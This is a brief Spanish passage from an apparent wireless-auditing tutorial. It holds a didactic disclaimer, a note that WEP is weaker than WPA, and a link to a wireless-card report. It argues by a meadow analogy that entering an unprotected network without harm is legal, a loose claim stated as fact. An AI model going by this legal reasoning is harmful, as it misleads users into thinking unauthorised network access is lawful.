prácticas hostiles; ya que tiene un carácter didáctico. Recordamos que si un prado no tiene vallado y pasamos por él sin hacer daño ni obtener nada de él no estamos infringiendo la ley; por tanto en una red sin protección cometemos una infracción al momento de usar un P2P, usar datos personales.

La encriptacion WEP es más débil que la WPA, aunque no todas las tarjetas la soportan.
Informe de tarjetas inalámbricas para la auditoria wireless http://hwagm.elhacker.net/htm/tarjetas.htm